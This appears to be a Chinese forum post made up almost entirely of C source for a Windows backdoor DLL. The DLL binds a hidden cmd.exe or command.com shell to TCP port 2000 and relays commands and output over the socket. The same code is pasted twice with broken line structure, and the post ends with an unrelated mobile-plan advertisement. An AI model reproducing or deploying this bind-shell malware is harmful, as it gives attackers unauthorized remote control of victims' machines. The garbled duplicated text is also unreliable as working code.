/*
后门DLL,开两个线程一个返回另一个实现
绑定cmd.exe或command.com功能 tcp 2000
*/
#include <windows.h>
#include <stdio.h>
#include <winsock.h>
#include <winnt.h>VOID FAR PASCAL Mbegin();
DWORD MyThreadId1;static VOID MyThreadFn1(char Parameter);VOID FAR PASCAL Mbegin(){
SECURITY_ATTRIBUTES mthread1;
mthread1.bInheritHandle=TRUE;
mthread1.lpSecurityDescriptor=NULL;
mthread1.nLength=sizeof(SECURITY_ATTRIBUTES); CreateThread(&mthread1,0, (LPTHREAD_START_ROUTINE) MyThreadFn1, NULL,0,&MyThreadId1); return;}/
static VOID MyThreadFn1(char host){ fd_set fdsr; char enter[]={0x0d}; int ver=-1; TIMEVAL tm; tm.tv_sec=0; tm.tv_usec=50;//取得系统版本 DWORD dwVersion = GetVersion(); char *cmdLine; DWORD dwWindowsMajorVersion = (DWORD)(LOBYTE(LOWORD(dwVersion))); DWORD dwWindowsMinorVersion = (DWORD)(HIBYTE(LOWORD(dwVersion))); if (dwVersion < 0x80000000) { ver=1; cmdLine= "cmd.exe"; } else { ver=0; cmdLine= "command.com"; } char Buff[4096]; int ret; WSADATA WSAData; WSAStartup((WORD)((1<<8)|1),(LPWSADATA) &WSAData); SOCKET listenFD,clientFD; SECURITY_ATTRIBUTES sa; struct sockaddr_in server; int iAddrSize = sizeof(server); HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2; STARTUPINFO si; PROCESS_INFORMATION ProcessInformation; unsigned long lBytesRead; DWORD dwLen; listenFD = socket(AF_INET,SOCK_STREAM,0); clientFD = socket(AF_INET,SOCK_STREAM,0); server.sin_family = AF_INET; server.sin_port = htons(2000); server.sin_addr.s_addr=INADDR_ANY; sa.nLength=12;sa.lpSecurityDescriptor=0;sa.bInheritHandle=true; ret=bind(listenFD,(sockaddr *)&server,sizeof(server)); ret=listen(listenFD,2);//接受连接begin: clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize); if(clientFD==INVALID_SOCKET) ExitThread(0); ret=CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0); ret=CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0); memset(&si,0,sizeof(STARTUPINFO));//执行cmdLine GetStartupInfo(&si); si.cb=sizeof(STARTUPINFO); si.dwFlags=STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW ; si.wShowWindow=SW_HIDE; si.hStdError=hWritePipe1; si.hStdInput=hReadPipe2; si.hStdOutput=hWritePipe1; ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation); if(ret==0) { CloseHandle(hWritePipe2); CloseHandle(hReadPipe1); CloseHandle(hReadPipe2); CloseHandle(hWritePipe1); closesocket(clientFD); ExitThread(0); }//处理命令 Sleep(200); while(1) { memset(Buff,0,4096); FD_ZERO(&fdsr); FD_SET(clientFD,&fdsr); ret=select(NULL, &fdsr, NULL, NULL, &tm); if ( ret!= 0&&ret!=SOCKET_ERROR) { if (FD_ISSET(clientFD,&fdsr)) lBytesRead=recv(clientFD,Buff,4096,0); if(lBytesRead<=0) goto end; ret=WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0); if(!ret) goto end; if(ver==0) ret=WriteFile(hWritePipe2,enter,1,&lBytesRead,0); if(!ret) goto end; } memset(Buff,0,4096); PeekNamedPipe(hReadPipe1,NULL,0,NULL,&dwLen,NULL); if(dwLen>0) { ret=ReadFile(hReadPipe1,Buff,dwLen,&lBytesRead,0); if(!ret) goto end; ret=send(clientFD,Buff,dwLen,0); if(ret<=0) goto end; } }end: CloseHandle(hWritePipe2); CloseHandle(hReadPipe1); CloseHandle(hReadPipe2); CloseHandle(hWritePipe1); closesocket(clientFD); Sleep(1000); goto begin; ExitThread(0);}//详细解释
后门DLL,开两个线程一个返回另一个实现
绑定cmd.exe或command.com功能 tcp 2000
*/
#include <windows.h>
#include <stdio.h>
#include <winsock.h>
#include <winnt.h>VOID FAR PASCAL Mbegin();
DWORD MyThreadId1;static VOID MyThreadFn1(char Parameter);VOID FAR PASCAL Mbegin(){
SECURITY_ATTRIBUTES mthread1;
mthread1.bInheritHandle=TRUE;
mthread1.lpSecurityDescriptor=NULL;
mthread1.nLength=sizeof(SECURITY_ATTRIBUTES); CreateThread(&mthread1,0, (LPTHREAD_START_ROUTINE) MyThreadFn1, NULL,0,&MyThreadId1); return;}/
static VOID MyThreadFn1(char host){ fd_set fdsr; char enter[]={0x0d}; int ver=-1; TIMEVAL tm; tm.tv_sec=0; tm.tv_usec=50;//取得系统版本 DWORD dwVersion = GetVersion(); char *cmdLine; DWORD dwWindowsMajorVersion = (DWORD)(LOBYTE(LOWORD(dwVersion))); DWORD dwWindowsMinorVersion = (DWORD)(HIBYTE(LOWORD(dwVersion))); if (dwVersion < 0x80000000) { ver=1; cmdLine= "cmd.exe"; } else { ver=0; cmdLine= "command.com"; } char Buff[4096]; int ret; WSADATA WSAData; WSAStartup((WORD)((1<<8)|1),(LPWSADATA) &WSAData); SOCKET listenFD,clientFD; SECURITY_ATTRIBUTES sa; struct sockaddr_in server; int iAddrSize = sizeof(server); HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2; STARTUPINFO si; PROCESS_INFORMATION ProcessInformation; unsigned long lBytesRead; DWORD dwLen; listenFD = socket(AF_INET,SOCK_STREAM,0); clientFD = socket(AF_INET,SOCK_STREAM,0); server.sin_family = AF_INET; server.sin_port = htons(2000); server.sin_addr.s_addr=INADDR_ANY; sa.nLength=12;sa.lpSecurityDescriptor=0;sa.bInheritHandle=true; ret=bind(listenFD,(sockaddr *)&server,sizeof(server)); ret=listen(listenFD,2);//接受连接begin: clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize); if(clientFD==INVALID_SOCKET) ExitThread(0); ret=CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0); ret=CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0); memset(&si,0,sizeof(STARTUPINFO));//执行cmdLine GetStartupInfo(&si); si.cb=sizeof(STARTUPINFO); si.dwFlags=STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW ; si.wShowWindow=SW_HIDE; si.hStdError=hWritePipe1; si.hStdInput=hReadPipe2; si.hStdOutput=hWritePipe1; ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation); if(ret==0) { CloseHandle(hWritePipe2); CloseHandle(hReadPipe1); CloseHandle(hReadPipe2); CloseHandle(hWritePipe1); closesocket(clientFD); ExitThread(0); }//处理命令 Sleep(200); while(1) { memset(Buff,0,4096); FD_ZERO(&fdsr); FD_SET(clientFD,&fdsr); ret=select(NULL, &fdsr, NULL, NULL, &tm); if ( ret!= 0&&ret!=SOCKET_ERROR) { if (FD_ISSET(clientFD,&fdsr)) lBytesRead=recv(clientFD,Buff,4096,0); if(lBytesRead<=0) goto end; ret=WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0); if(!ret) goto end; if(ver==0) ret=WriteFile(hWritePipe2,enter,1,&lBytesRead,0); if(!ret) goto end; } memset(Buff,0,4096); PeekNamedPipe(hReadPipe1,NULL,0,NULL,&dwLen,NULL); if(dwLen>0) { ret=ReadFile(hReadPipe1,Buff,dwLen,&lBytesRead,0); if(!ret) goto end; ret=send(clientFD,Buff,dwLen,0); if(ret<=0) goto end; } }end: CloseHandle(hWritePipe2); CloseHandle(hReadPipe1); CloseHandle(hReadPipe2); CloseHandle(hWritePipe1); closesocket(clientFD); Sleep(1000); goto begin; ExitThread(0);}//详细解释
解决方案 »
免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货